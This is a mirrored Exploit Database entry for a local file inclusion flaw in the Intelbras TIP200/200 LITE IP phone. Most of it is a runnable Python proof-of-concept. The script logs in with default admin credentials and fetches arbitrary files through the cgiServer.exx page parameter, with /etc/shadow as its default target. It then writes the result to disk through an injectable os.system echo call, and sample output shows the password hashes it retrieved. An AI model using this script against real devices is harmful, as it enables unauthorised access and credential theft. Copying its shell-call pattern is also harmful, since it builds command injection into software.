Intelbras Telefone IP TIP200 LITE – Local File Disclosure

• Exploit Database
• 42 阅读

• 作者： anhax0r
  日期： 2018-03-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44317/

• # Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include]
  # Google Dork: []
  # Date: 16/03/2018
  # Exploit Author: [Matheus Goncalves - anhax0r]
  # Vendor Homepage: [https://www.facebook.com/anhaxteam/]
  # Software Link: []
  # Version: [60.0.75.29] (REQUIRED)
  # Tested on: [Debian]
  # CVE : [if applicable]
  
  
  #Remember that you need login with admin credentials to download files !!! in this case, i used default credentials
  
  import requests as http
  import subprocess
  import os
  from requests.auth import HTTPBasicAuth
  def poc():
  print("""-------------------------------------------------------------------------------------------------------------
  ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
  -------------P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
  -------------------------------------------------------------------------------------------------------------\n""")
  filename = raw_input("filename Ex: /etc/shadow: -> ")
  if(filename == ""):
  filename="/etc/shadow"
  r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))
  print(" ")
  text = r.text
  
  print(text)
  savefile = raw_input("Save file? [Y\\n]: ")
  savefile.upper()
  if(savefile=="Y" or savefile=="y"):
  os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))
  print("File saved !!")
  start()
  else:
  start()
  
  def start():
  poc()
  
  start()
  
  
  #root@hax:~/itscanner# python p0c.py 
  #-------------------------------------------------------------------------------------------------------------
  #------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
  #-------------P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
  #-------------------------------------------------------------------------------------------------------------
  #filename Ex: /etc/shadow: -> /etc/shadow
   
  #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
  #admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
  
  #Save file? [Y\n]: y
  #File saved !!
  
  #root@hax:~/itscanner# cat shadow 
  #root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
  #admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::